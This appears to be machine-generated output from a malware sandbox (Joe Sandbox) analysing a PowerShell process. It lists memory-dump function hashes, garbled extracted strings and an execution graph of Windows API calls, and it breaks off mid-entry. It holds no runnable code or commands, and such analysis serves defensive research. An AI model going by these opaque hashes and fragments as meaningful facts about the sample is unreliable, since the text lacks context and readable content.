                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4e6d3596e178f561e70da152162c6bfc7f2dbdb7996800ba9f92e626607f8ba4
                                                                                                              • Instruction ID: b70e7afe5fd566f6d6bdd7c9b1dbedeb003979780cf69c1cb345f43f0cea59b2
                                                                                                              • Opcode Fuzzy Hash: 4e6d3596e178f561e70da152162c6bfc7f2dbdb7996800ba9f92e626607f8ba4
                                                                                                              • Instruction Fuzzy Hash: CEE04F3890405D8BCB09BBA4F45A8AD7F70FE05301B0005ECE9A752192EA61094BCBC1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 614a3136d3b0b7cfab0acf04db40a468c961c7f4808db505861d74e45587bef0
                                                                                                              • Instruction ID: 40c7b35819ab558c629320a66a219eec3a105c94febbc194ebe71e92f3d7d6ef
                                                                                                              • Opcode Fuzzy Hash: 614a3136d3b0b7cfab0acf04db40a468c961c7f4808db505861d74e45587bef0
                                                                                                              • Instruction Fuzzy Hash: 65E04838D0824A8BCB15DB78E44646EBFF0FF46254B1052ADE95797602D6311886DF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d0c592e08dc831d3511c70459cc005d62bdc30dde8623563a1f9bfefb5ff770
                                                                                                              • Instruction ID: 4a6f9601024adeeba34f947365faf61bf4f921417f51fa0c4fef28afe290ad21
                                                                                                              • Opcode Fuzzy Hash: 8d0c592e08dc831d3511c70459cc005d62bdc30dde8623563a1f9bfefb5ff770
                                                                                                              • Instruction Fuzzy Hash: EFE01A70E0414A8F8F80DFBC84815A9FFF1EB59240B2085AEC908E6201E2324A118F81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                              • Instruction ID: 8aecd1bcdc9a334a7e27777f311a9932505e944a22103cc24d78dd0b7300f744
                                                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                              • Instruction Fuzzy Hash: D7D067B0D042099F8B80EFADC94156EFBF4EB48200F6085BA8919E7341F7329A128BD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52c891a05667d5b2c7539a097148a3b808bd570c4d4c206ea6bb9b0aa0631692
                                                                                                              • Instruction ID: b4c9f37568afecd3912df857e28f1af4308fe572828e09d8ed8faee9940bc14e
                                                                                                              • Opcode Fuzzy Hash: 52c891a05667d5b2c7539a097148a3b808bd570c4d4c206ea6bb9b0aa0631692
                                                                                                              • Instruction Fuzzy Hash: 20D0173880411D8BCB08EBA4F81A4BDBB74FA00301F4001ADE91752192EA702A4ACAC0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 68d9cda7cd4b2b42badcf1bf142137c5569957ab2f1f051c9e78f656bcded7aa
                                                                                                              • Instruction ID: 1ff1fcd420bf27abf0758993afbb705d4d8801b3778ced2001caa0766e88a051
                                                                                                              • Opcode Fuzzy Hash: 68d9cda7cd4b2b42badcf1bf142137c5569957ab2f1f051c9e78f656bcded7aa
                                                                                                              • Instruction Fuzzy Hash: EDD01738A0820E8FCB08EFA8E44686EBBF5EB45200F0041ADE90A93340EA306D41CBC1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 66f00be81bb3507ef332631010998a58d7f436615839d745c3ce860c5effeb25
                                                                                                              • Instruction ID: 64752a935f2db77c88fdccad32dbbf9ca453aed6f191a8644b1b379abb2ddaca
                                                                                                              • Opcode Fuzzy Hash: 66f00be81bb3507ef332631010998a58d7f436615839d745c3ce860c5effeb25
                                                                                                              • Instruction Fuzzy Hash: 24D0C93404E3C49FC71BDF7896988183FB06E0362531A06DEE8868F6B7CE768448CB06
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 106c6c0e3d8bfb97f578d99999e9b2c1d8f51d20457f31a4fdad547482eace5f
                                                                                                              • Instruction ID: e62caf3cb6629873666d52f9358f6aebf52ab269e48a66a2b808c38889b76cb8
                                                                                                              • Opcode Fuzzy Hash: 106c6c0e3d8bfb97f578d99999e9b2c1d8f51d20457f31a4fdad547482eace5f
                                                                                                              • Instruction Fuzzy Hash: 6AC08C1940E3C04FDF0B9B3449280033F325F4321030A45EBC081CB8B3CD640809CB12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 383b73cd7e739175ccf66f9d29ff230f56dd2b99bb5930d71eea4ed57aed4de6
                                                                                                              • Instruction ID: c905136be144478396e9ccdb8587bfd0c9c7f42813f466387bb4e9f16a0ec0ee
                                                                                                              • Opcode Fuzzy Hash: 383b73cd7e739175ccf66f9d29ff230f56dd2b99bb5930d71eea4ed57aed4de6
                                                                                                              • Instruction Fuzzy Hash: 01B09230044708CFC248AF79A408A187769BB4421638204A8F80E0A69A8E36E884CA48
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$4'q$4'q$84#l$84#l$pij$tPq$tPq$J&l$J&l$J&l$J&l$J&l$r%l$r%l
                                                                                                              • API String ID: 0-1126545161
                                                                                                              • Opcode ID: 3b71ad7d71917cbf6a243ed2b4f71746781ffda355d611677ba860b6e5226365
                                                                                                              • Instruction ID: 459669e56899ed6c98060c06848796ed174ae51c0e580a37ae60b07e9dd773b0
                                                                                                              • Opcode Fuzzy Hash: 3b71ad7d71917cbf6a243ed2b4f71746781ffda355d611677ba860b6e5226365
                                                                                                              • Instruction Fuzzy Hash: B9D114B1F0460E8FD7249F6C941866AFBB2AFA6A11F18C0BBC945DB251DB31C845C7E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                                                                                              • API String ID: 0-2958727440
                                                                                                              • Opcode ID: 73854c037bf10a149edd8c16c93f6b606f2379df411ad5bf8d60ebed40d47463
                                                                                                              • Instruction ID: 6a92765b580b1992258b386cf5eb76ac35067299eda9179db4aa9d8b827a39f7
                                                                                                              • Opcode Fuzzy Hash: 73854c037bf10a149edd8c16c93f6b606f2379df411ad5bf8d60ebed40d47463
                                                                                                              • Instruction Fuzzy Hash: E5A167B17043199FD7209F6D8811766BBF6AFD6621F2880BAD849DB791CA31CC42C7E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$4'q$4'q$4'q$4'q$r%l$r%l
                                                                                                              • API String ID: 0-885150609
                                                                                                              • Opcode ID: 1337e3f7a97368f6a5ce47bd1b6582f181b64e6903a6fb6159229d1b30bb67bc
                                                                                                              • Instruction ID: 8ea3d2b10190ac651632bc0c88017a0bbd32f8f777956acc8390f0efaac1c601
                                                                                                              • Opcode Fuzzy Hash: 1337e3f7a97368f6a5ce47bd1b6582f181b64e6903a6fb6159229d1b30bb67bc
                                                                                                              • Instruction Fuzzy Hash: AEF156B1B043099FDB149F6C981076ABBA3AFD2615F18C0BBD945CB242DA75CC92C7E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: J&l$J&l$J&l$J&l$J&l$J&l
                                                                                                              • API String ID: 0-746756887
                                                                                                              • Opcode ID: 685ed9755d49e955a22c8459f77556819bac5ed61ca49f21849924b06723d86c
                                                                                                              • Instruction ID: 7d1f586cd66f0e85f983b082c66af0de9db318a4523dfbe4553fbea3202a033d
                                                                                                              • Opcode Fuzzy Hash: 685ed9755d49e955a22c8459f77556819bac5ed61ca49f21849924b06723d86c
                                                                                                              • Instruction Fuzzy Hash: 433145F16093556FD3258A285C21B67BB657BE3211B1880ABD8C1EFA81C9709CC1C3F2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$pij$|,j$J&l$J&l$r%l
                                                                                                              • API String ID: 0-263638844
                                                                                                              • Opcode ID: 18cf515902c1e661b174b66f22d1d835b787ec3e32e29ef66a00c36c4f60ed38
                                                                                                              • Instruction ID: f3ce256dbcca8de6203287625acfd80d9316d8f4d342b85460878dfb77c33b8d
                                                                                                              • Opcode Fuzzy Hash: 18cf515902c1e661b174b66f22d1d835b787ec3e32e29ef66a00c36c4f60ed38
                                                                                                              • Instruction Fuzzy Hash: 3831E1F1A0020BDBDB24CF5DC461B66B7A5BF65315F0481AAD805DB250E735DE80CBE2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: tM%l$`q$`q$`q$`q
                                                                                                              • API String ID: 0-2306036421
                                                                                                              • Opcode ID: b98eb69db3766b0ffc35e87b21827eb294772bec9f20f231bee253888a11a755
                                                                                                              • Instruction ID: 0de7f1406bfa2a20adb3bffda385760c4fd4d28bba4ca56b3355cff77197234c
                                                                                                              • Opcode Fuzzy Hash: b98eb69db3766b0ffc35e87b21827eb294772bec9f20f231bee253888a11a755
                                                                                                              • Instruction Fuzzy Hash: C6B1B074E012099FDB14DFA9D980A9DFBF2FF89300F108629D859AB304EB70A945CF91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: tM%l$`q$`q$`q$`q
                                                                                                              • API String ID: 0-2306036421
                                                                                                              • Opcode ID: 93bb6c73bda0290f4334a1446af2730c9bd9e2ce5c2b12481b3ee71b6090c356
                                                                                                              • Instruction ID: 45881f79ae3bd814ab428a57da5cb2ed89dfcba57fed49408b634f929de5225f
                                                                                                              • Opcode Fuzzy Hash: 93bb6c73bda0290f4334a1446af2730c9bd9e2ce5c2b12481b3ee71b6090c356
                                                                                                              • Instruction Fuzzy Hash: B8B1A274E012099FDB54DFA9D980A9DFBF2FF88304F148629D819AB304EB70A945CF90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: tM%l$`q$`q$`q$`q
                                                                                                              • API String ID: 0-2306036421
                                                                                                              • Opcode ID: 674511cc89eb321916a8db7b37107657cea29711b4480e0a04a718aa5ea102f6
                                                                                                              • Instruction ID: 5ae131b3dec0e1d168397d91b8edd3ea5ff8731a20841fa7b7ea4fac8bd7e4fa
                                                                                                              • Opcode Fuzzy Hash: 674511cc89eb321916a8db7b37107657cea29711b4480e0a04a718aa5ea102f6
                                                                                                              • Instruction Fuzzy Hash: 91A19174E012099FDB54CFA9D980A9DFBF2BF88300F148669D819AB304EB70A945CF90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$$q$$q$$q
                                                                                                              • API String ID: 0-170447905
                                                                                                              • Opcode ID: 1a353cbbb3eba0b2de8790007efe87534a068c890fd69e687efdca6ab6a4bdb1
                                                                                                              • Instruction ID: d03a27bdf8b24a3dff6387dbbc7f45b1a5f63a8582bd4542629922cecc288037
                                                                                                              • Opcode Fuzzy Hash: 1a353cbbb3eba0b2de8790007efe87534a068c890fd69e687efdca6ab6a4bdb1
                                                                                                              • Instruction Fuzzy Hash: 725125F570430AAFDB245E2D8800766FBB6AFD2622F28807BD445CBA41DA75C891C7E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$84#l$tPq$J&l$J&l
                                                                                                              • API String ID: 0-2638263250
                                                                                                              • Opcode ID: c965bca235fb7c1bf9ffc8614435b2e94e7a9b1144a2d5c26a3bdaa0e4def7dc
                                                                                                              • Instruction ID: 83287d4b3f41a2389be873cf8a791779be694bc944a3e26ccebffc07429a41b9
                                                                                                              • Opcode Fuzzy Hash: c965bca235fb7c1bf9ffc8614435b2e94e7a9b1144a2d5c26a3bdaa0e4def7dc
                                                                                                              • Instruction Fuzzy Hash: AA21F2B1E00A0ADFDB248F4CC459B26F7A2BFA1B15F1880A6DA04DF151C772C981C7E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$84#l$tPq$J&l$J&l
                                                                                                              • API String ID: 0-2638263250
                                                                                                              • Opcode ID: 8c47d4cdf12f4717dcd369b54a46db28761453500be1003c2c9f60c2b4129b24
                                                                                                              • Instruction ID: 99f59698a10aef4279317be8f7a88a13ac2521a3c45c7285631b7f5172e687cb
                                                                                                              • Opcode Fuzzy Hash: 8c47d4cdf12f4717dcd369b54a46db28761453500be1003c2c9f60c2b4129b24
                                                                                                              • Instruction Fuzzy Hash: 3521E4B1E00A0ADBDB208E4CC459B26F7A2BFA1B15F188066DA04DF151C772D941C7E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q
                                                                                                              • API String ID: 0-4102054182
                                                                                                              • Opcode ID: ca15ca4e00f3d8ffca5909a8bb05f558943266b60449fbd83023ba7bbb210faf
                                                                                                              • Instruction ID: ef03744f85451cbc5d3a588795b797ffc13287f016d42b283562f5c3d3bc3929
                                                                                                              • Opcode Fuzzy Hash: ca15ca4e00f3d8ffca5909a8bb05f558943266b60449fbd83023ba7bbb210faf
                                                                                                              • Instruction Fuzzy Hash: 0B217BB130031AABEB345E3E8801737B7D79BE1617F68843AE905CB381DDB9C85183A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$$q$$q
                                                                                                              • API String ID: 0-3199993180
                                                                                                              • Opcode ID: 991c7f58a48825eaaf54a695f620e69ebb3fde4281e5a47e410456707afd13b9
                                                                                                              • Instruction ID: 2ec34a0069e0a36a0f6e3dad59648f93e2d6f1b13a7f63c1441bd497e9de0245
                                                                                                              • Opcode Fuzzy Hash: 991c7f58a48825eaaf54a695f620e69ebb3fde4281e5a47e410456707afd13b9
                                                                                                              • Instruction Fuzzy Hash: E6018F6170979A5FC726162818212A6BB725FD3966B2D40E7D081DB653C96C4C4AC3A3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$J&l$J&l
                                                                                                              • API String ID: 0-1924908692
                                                                                                              • Opcode ID: 189e90ba801e3fa2c290f32188b821d13c8d96e86556c64a29ae04df8004cd94
                                                                                                              • Instruction ID: 796ae7bfdf3217e86e73ea03398054ed1198d6cf877b6aa3cec1b8e1006860a8
                                                                                                              • Opcode Fuzzy Hash: 189e90ba801e3fa2c290f32188b821d13c8d96e86556c64a29ae04df8004cd94
                                                                                                              • Instruction Fuzzy Hash: BE01D4B26093865FD3234A2D4C2025ABB766FE3511B294197C5C5EF266D5389C46C3F2

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:12.1%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:441
                                                                                                              Total number of Limit Nodes:42
                                                                                                              execution_graph 30090 15a5238 30091 15a524f 30090->30091 30097 15a4e0c 30091->30097 30093 15a52be 30102 6661660 30093->30102 30106 66616b8 30093->30106 30098 15a4e17 30097->30098 30101 65e6890 7 API calls 30098->30101 30110 65e6889 30098->30110 30099 15a7abe 30099->30093 30101->30099 30103 6661665 30102->30103 30115 66612f4 30103->30115 30107 66616c7 30106->30107 30108 66612f4 4 API calls 30107->30108 30109 15a52c5 30108->30109 30111 65e688e 30110->30111 30112 65e68dd 30111->30112 30113 65eadd8 7 API calls 30111->30113 30114 65eade8 7 API calls 30111->30114 30112->30099 30113->30112 30114->30112 30116 66612ff 30115->30116 30119 6661334 30116->30119 30118 66617ad 30118->30118 30124 666133f 30119->30124 30120 6661a28 30125 6661a53 30120->30125 30128 66615a8 30120->30128 30122 66615a8 OleInitialize 30122->30120 30123 6661a40 30132 6663350 30123->30132 30137 6663360 30123->30137 30124->30120 30124->30122 30124->30125 30125->30118 30130 66615b3 30128->30130 30129 6662df9 30129->30123 30130->30129 30142 6662194 30130->30142 30135 66633c5 30132->30135 30133 6663828 WaitMessage 30133->30135 30135->30133 30136 6663412 30135->30136 30149 666225c 30135->30149 30136->30125 30140 66633c5 30137->30140 30138 6663828 WaitMessage 30138->30140 30139 666225c DispatchMessageW 30139->30140 30140->30138 30140->30139 30141 6663412 30140->30141 30141->30125 30144 666219f 30142->30144 30143 6663113 30143->30129 30144->30143 30146 66621b0 30144->30146 30147 6663148 OleInitialize 30146->30147 30148 66631ac 30147->30148 30148->30143 30150 66640c8 DispatchMessageW 30149->30150 30151 6664134 30150->30151 30151->30135 29670 65e6718 29671 65e6728 29670->29671 29675 65ed46a 29671->29675 29681 65ed478 29671->29681 29672 65e6751 29676 65ed478 29675->29676 29687 65e7d60 29676->29687 29678 65ed502 29699 65eb930 29678->29699 29680 65ed509 29680->29672 29682 65ed4ad 29681->29682 29683 65e7d60 7 API calls 29682->29683 29684 65ed502 29683->29684 29685 65eb930 7 API calls 29684->29685 29686 65ed509 29685->29686 29686->29672 29688 65e7d8c 29687->29688 29691 65e7fc4 29688->29691 29709 65e798c 29688->29709 29689 65e816c 29689->29678 29691->29689 29693 65e6890 7 API calls 29691->29693 29692 65e7e45 29694 65e6890 7 API calls 29692->29694 29698 65e7eed 29692->29698 29693->29689 29695 65e7eb7 29694->29695 29696 65e6890 7 API calls 29695->29696 29696->29698 29715 65e6890 29698->29715 29700 65eb93b 29699->29700 29701 65ed72f 29700->29701 29702 65ed767 29700->29702 29708 65ed736 29700->29708 29703 65e6890 7 API calls 29701->29703 29704 65ed78c 29702->29704 29705 65ed7b8 29702->29705 29703->29708 29706 65e6890 7 API calls 29704->29706 29707 65e6890 7 API calls 29705->29707 29706->29708 29707->29708 29708->29680 29712 65e7997 29709->29712 29710 65e8307 29710->29692 29711 65e6890 7 API calls 29714 65e82c9 29711->29714 29712->29710 29713 65e6890 7 API calls 29712->29713 29712->29714 29713->29714 29714->29710 29714->29711 29716 65e6891 29715->29716 29717 65e68dd 29716->29717 29720 65eadd8 29716->29720 29745 65eade8 29716->29745 29717->29691 29725 65eade5 29720->29725 29721 65eaf1b 29722 65eaef0 29721->29722 29723 65e2208 7 API calls 29721->29723 29775 65e8ef4 29722->29775 29723->29722 29725->29721 29730 65eaebf 29725->29730 29728 65eaf35 29795 65e8e88 29728->29795 29770 65e2208 29730->29770 29732 65eaf3d 29733 65e6890 7 API calls 29732->29733 29734 65eb047 29732->29734 29735 65eafed 29733->29735 29799 65e16b0 29734->29799 29806 65e16c0 29734->29806 29821 65e4088 29735->29821 29736 65eb0a8 29813 65ea8d0 29736->29813 29817 65ea8c1 29736->29817 29738 65eb0bc 29739 65eb010 29739->29734 29824 65e8f64 29739->29824 29750 65eae21 29745->29750 29746 65eaf1b 29747 65eaef0 29746->29747 29748 65e2208 7 API calls 29746->29748 29749 65e8ef4 7 API calls 29747->29749 29748->29747 29751 65eaf2b 29749->29751 29750->29746 29755 65eaebf 29750->29755 29752 65e8f04 7 API calls 29751->29752 29753 65eaf35 29752->29753 29754 65e8e88 7 API calls 29753->29754 29757 65eaf3d 29754->29757 29756 65e2208 7 API calls 29755->29756 29756->29747 29758 65e6890 7 API calls 29757->29758 29759 65eb047 29757->29759 29760 65eafed 29758->29760 29768 65e16c0 2 API calls 29759->29768 29769 65e16b0 2 API calls 29759->29769 29762 65e4088 SetWindowLongW 29760->29762 29761 65eb0a8 29766 65ea8d0 7 API calls 29761->29766 29767 65ea8c1 7 API calls 29761->29767 29764 65eb010 29762->29764 29763 65eb0bc 29764->29759 29765 65e8f64 7 API calls 29764->29765 29765->29759 29766->29763 29767->29763 29768->29761 29769->29761 29772 65e2347 29770->29772 29773 65e2239 29770->29773 29771 65e2245 29771->29722 29772->29722 29773->29771 29831 65e19f0 7 API calls 29773->29831 29777 65e8eff 29775->29777 29776 65eaf2b 29781 65e8f04 29776->29781 29777->29776 29778 65e6890 7 API calls 29777->29778 29779 65ed9f0 29778->29779 29780 65e4088 SetWindowLongW 29779->29780 29780->29776 29782 65e8f0f 29781->29782 29783 65edf21 29782->29783 29788 65edf74 29782->29788 29794 65edfa8 29782->29794 29838 65eba14 7 API calls 29782->29838 29784 65edf5a 29783->29784 29786 65e8f64 7 API calls 29783->29786 29785 65e8f64 7 API calls 29784->29785 29787 65edf66 29785->29787 29789 65edf4c 29786->29789 29791 65eda44 7 API calls 29787->29791 29793 65e6890 7 API calls 29788->29793 29788->29794 29832 65eda44 29789->29832 29791->29788 29793->29794 29794->29728 29796 65e8e93 29795->29796 29797 65e6890 7 API calls 29796->29797 29798 65ea914 29796->29798 29797->29798 29798->29732 29801 65e16c0 29799->29801 29800 65e16e5 29800->29736 29801->29800 29802 65e1818 KiUserCallbackDispatcher 29801->29802 29842 6660ad8 29801->29842 29847 6660ac9 29801->29847 29802->29800 29807 65e16c1 29806->29807 29808 65e1818 KiUserCallbackDispatcher 29807->29808 29810 6660ad8 SetWindowLongW 29807->29810 29811 6660ac9 SetWindowLongW 29807->29811 29812 65e16e5 29807->29812 29808->29812 29810->29808 29811->29808 29812->29736 29814 65ea8dd 29813->29814 29815 65e8e88 7 API calls 29814->29815 29816 65ea8e4 29815->29816 29816->29738 29818 65ea8d0 29817->29818 29819 65e8e88 7 API calls 29818->29819 29820 65ea8e4 29819->29820 29820->29738 29822 65e40a0 29821->29822 29823 65e1b7c SetWindowLongW 29821->29823 29822->29739 29823->29822 29826 65e8f6f 29824->29826 29825 65efbee 29825->29734 29826->29825 29827 65e6890 7 API calls 29826->29827 29828 65efc48 29827->29828 29829 65ee460 SendMessageW 29828->29829 29830 65efc59 29829->29830 29830->29734 29831->29772 29833 65eda4f 29832->29833 29834 65e6890 7 API calls 29833->29834 29835 65efc48 29834->29835 29839 65ee460 29835->29839 29838->29783 29840 65efc70 SendMessageW 29839->29840 29841 65efc59 29840->29841 29841->29784 29843 6660ad9 29842->29843 29845 65e4088 SetWindowLongW 29843->29845 29852 65e4077 29843->29852 29844 6660afa 29844->29802 29845->29844 29848 6660ad8 29847->29848 29850 65e4088 SetWindowLongW 29848->29850 29851 65e4077 SetWindowLongW 29848->29851 29849 6660afa 29849->29802 29850->29849 29851->29849 29855 65e1b7c 29852->29855 29856 65e40b8 SetWindowLongW 29855->29856 29857 65e40a0 29856->29857 29857->29844 29858 15afd10 DuplicateHandle 29859 15afda6 29858->29859 30152 15ad330 30153 15ad331 30152->30153 30156 15ad418 30153->30156 30154 15ad33f 30158 15ad428 30156->30158 30157 15ad45c 30157->30154 30158->30157 30159 15ad660 GetModuleHandleW 30158->30159 30160 15ad68d 30159->30160 30160->30154 30161 65e3e70 30162 65e3ed8 CreateWindowExW 30161->30162 30164 65e3f94 30162->30164 29860 65e800c 29861 65e8015 29860->29861 29863 65e8033 29860->29863 29862 65e6890 7 